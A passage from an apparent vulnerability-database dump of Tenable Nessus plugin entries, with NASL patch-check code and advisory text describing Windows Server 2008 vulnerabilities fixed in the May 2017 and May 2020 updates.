hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KB4018196 Applies only to hosts having 'DNS Server' role installed\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\ndns_role_installed = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Services\\DNS\\DisplayName\"\n);\nRegCloseKey(handle:hklm);\nclose_registry(close:TRUE);\n\n# KBs only apply to Windows 2008\nif (hotfix_check_sp_range(vista:'2') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nsystemroot = hotfix_get_systemroot();\nif (!systemroot) audit(AUDIT_PATH_NOT_DETERMINED, 'system root');\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nwinsxs = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:\"\\1\\WinSxS\", string:systemroot);\nwinsxs_share = hotfix_path2share(path:systemroot);\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:winsxs_share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, winsxs_share);\n}\n\nthe_session = make_array(\n 'login', login,\n 'password', pass,\n 'domain', domain,\n 'share', winsxs_share\n);\n\nvuln = 0;\n\n# 4018196\nif (!isnull(dns_role_installed))\n{\n files = list_dir(basedir:winsxs, level:0, dir_pat:\"dns-server-service_31bf3856ad364e35_\", file_pat:\"^dns\\.exe$\", max_recurse:1);\n vuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19765','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018196\", session:the_session);\n}\n\n# 4018466\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"smbserver-common_31bf3856ad364e35_\", file_pat:\"^srvnet\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19673','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018466\", session:the_session);\n\n# 4018556\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"com-base-qfe-ole32_31bf3856ad364e35_\", file_pat:\"^ole32\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19773','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018556\", session:the_session);\n\n# 4018821\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"tdi-over-tcpip_31bf3856ad364e35_\", file_pat:\"^tdx\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19762','6.0.6002.24087'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018821\", session:the_session);\n\n# 4018885\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"tcpip-binaries_31bf3856ad364e35_\", file_pat:\"^tcpip\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19763','6.0.6002.24087'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018885\", session:the_session);\n\n# 4018927\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"rds-datafactory-dll_31bf3856ad364e35_\", file_pat:\"^msadcf\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19770','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018927\", session:the_session);\n\n# 4019149\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"lddmcore_31bf3856ad364e35_\", file_pat:\"^dxgkrnl\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('7.0.6002.19765','7.0.6002.24089'),\n max_versions:make_list('7.0.6002.20000','7.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4019149\", session:the_session);\n\n# 4019204\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"win32k_31bf3856ad364e35_\", file_pat:\"^win32k\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19778','6.0.6002.24095'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4019204\", session:the_session);\n\n# 4019206\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"gdi32_31bf3856ad364e35_\", file_pat:\"^gdi32\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19765','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4019206\", session:the_session);\n\nif (vuln > 0)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-11T15:53:28", "description": "The remote Windows host is missing security update 4556854 or cumulative update 4556860. It is, therefore, affected by multiple vulnerabilities :\n\n - A denial of service vulnerability exists when .NET Core or .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Core or .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Core or .NET Framework application. The update addresses the vulnerability by correcting how the .NET Core or .NET Framework web application handles web requests. (CVE-2020-1108)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-1141)\n\n - A denial of service vulnerability exists when Hyper-V on a Windows Server fails to properly handle specially crafted network packets. (CVE-2020-0909)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1072)\n\n - A security feature bypass vulnerability exists in Microsoft Windows when the Task Scheduler service fails to properly verify client connections over RPC. An attacker who successfully exploited this vulnerability could run arbitrary code as an administrator. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1113)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0963)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1048, CVE-2020-1070)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1051, CVE-2020-1174, CVE-2020-1175, CVE-2020-1176)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1062, CVE-2020-1092)\n\n - An elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level. (CVE-2020-1066)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1078)\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. (CVE-2020-1064)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1153)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1054, CVE-2020-1143)\n\n - A remote code execution vulnerability exists in the way that Windows handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code with elevated permissions on a target system. (CVE-2020-1067)\n\n - An information disclosure vulnerability exists when the Windows Client Server Run-Time Subsystem (CSRSS) fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1116)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1112)\n\n - An elevation of privilege vulnerability exists when the Windows Printer Service improperly validates file paths while loading printer drivers. An authenticated attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges.\n (CVE-2020-1081)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Script Runtime handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1061)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1114)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1154)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1035, CVE-2020-1058, CVE-2020-1060, CVE-2020-1093)", "cvss3": {"score": 9.9, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-05-12T00:00:00", "type": "nessus", "title": "KB4556854: Windows Server 2008 May 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0909", "CVE-2020-0963", "CVE-2020-1035", "CVE-2020-1048", "CVE-2020-1051", "CVE-2020-1054", "CVE-2020-1058", "CVE-2020-1060", "CVE-2020-1061", "CVE-2020-1062", "CVE-2020-1064", "CVE-2020-1066", "CVE-2020-1067", "CVE-2020-1070", "CVE-2020-1072", "CVE-2020-1078", "CVE-2020-1081", "CVE-2020-1092", "CVE-2020-1093", "CVE-2020-1108", "CVE-2020-1112", "CVE-2020-1113", "CVE-2020-1114", "CVE-2020-1116", "CVE-2020-1141", "CVE-2020-1143", "CVE-2020-1153", "CVE-2020-1154", "CVE-2020-1174", "CVE-2020-1175", "CVE-2020-1176"], "modified": "2022-05-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_MAY_4556860.NASL", "href": "https://www.tenable.com/plugins/nessus/136510", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136510);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/13\");\n\n script_cve_id(\n \"CVE-2020-0909\",\n \"CVE-2020-0963\",\n \"CVE-2020-1035\",\n \"CVE-2020-1048\",\n \"CVE-2020-1051\",\n \"CVE-2020-1054\",\n \"CVE-2020-1058\",\n \"CVE-2020-1060\",\n \"CVE-2020-1061\",\n \"CVE-2020-1062\",\n \"CVE-2020-1064\",\n \"CVE-2020-1066\",\n \"CVE-2020-1067\",\n \"CVE-2020-1070\",\n \"CVE-2020-1072\",\n \"CVE-2020-1078\",\n \"CVE-2020-1081\",\n \"CVE-2020-1092\",\n \"CVE-2020-1093\",\n \"CVE-2020-1108\",\n \"CVE-2020-1112\",\n \"CVE-2020-1113\",\n \"CVE-2020-1114\",\n \"CVE-2020-1116\",\n \"CVE-2020-1141\",\n \"CVE-2020-1143\",\n \"CVE-2020-1153\",\n \"CVE-2020-1154\",\n \"CVE-2020-1174\",\n \"CVE-2020-1175\",\n \"CVE-2020-1176\"\n );\n script_xref(name:\"MSKB\", value:\"4556854\");\n script_xref(name:\"MSKB\", value:\"4556860\");\n script_xref(name:\"MSFT\", value:\"MS20-4556854\");\n script_xref(name:\"MSFT\", value:\"MS20-4556860\");\n script_xref(name:\"IAVA\", value:\"2020-A-0213-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4556854: Windows Server 2008 May 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4556854\nor cumulative update 4556860. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A denial of service vulnerability exists when .NET Core\n or .NET Framework improperly handles web requests. An\n attacker who successfully exploited this vulnerability\n could cause a denial of service against a .NET Core or\n .NET Framework web application. The vulnerability can be\n exploited remotely, without authentication. A remote\n unauthenticated attacker could exploit this\n vulnerability by issuing specially crafted requests to\n the .NET Core or .NET Framework application. The update\n addresses the vulnerability by correcting how the .NET\n Core or .NET Framework web application handles web\n requests. (CVE-2020-1108)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2020-1141)\n\n - A denial of service vulnerability exists when Hyper-V on\n a Windows Server fails to properly handle specially\n crafted network packets. (CVE-2020-0909)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1072)\n\n - A security feature bypass vulnerability exists in\n Microsoft Windows when the Task Scheduler service fails\n to properly verify client connections over RPC. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code as an administrator. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1113)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0963)\n\n - An elevation of privilege vulnerability exists when the\n Windows Print Spooler service improperly allows\n arbitrary writing to the file system. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1048, CVE-2020-1070)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1051, CVE-2020-1174, CVE-2020-1175,\n CVE-2020-1176)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1062,\n CVE-2020-1092)\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2020-1066)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1078)\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1064)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1153)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1054, CVE-2020-1143)\n\n - A remote code execution vulnerability exists in the way\n that Windows handles objects in memory. An attacker who\n successfully exploited the vulnerability could execute\n arbitrary code with elevated permissions on a target\n system. (CVE-2020-1067)\n\n - An information disclosure vulnerability exists when the\n Windows Client Server Run-Time Subsystem (CSRSS) fails\n to properly handle objects in memory. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2020-1116)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1112)\n\n - An elevation of privilege vulnerability exists when the\n Windows Printer Service improperly validates file paths\n while loading printer drivers. An authenticated attacker\n who successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges.\n (CVE-2020-1081)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Script Runtime handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1061)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1114)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-1154)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1035, CVE-2020-1058,\n CVE-2020-1060, CVE-2020-1093)\");\n # https://support.microsoft.com/en-us/help/4556854/windows-server-2008-update-kb4556854\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a3602bfa\");\n # https://support.microsoft.com/en-us/help/4556860/windows-server-2008-update-kb4556860\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cf75f677\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4556854 or Cumulative Update KB4556860.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1176\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1112\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Spooler Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-05';\nkbs = make_list(\n '4556860',\n '4556854'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'05_2020',\n bulletin:bulletin,\n rollup_kb_list:[4556860, 4556854])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:23:28", "description": "The remote Windows host is missing security update 4019213 or cumulative update 4019215. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows DNS server when it's configured to answer version queries. An unauthenticated, remote attacker can exploit this, via a malicious DNS query, to cause the DNS server to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can 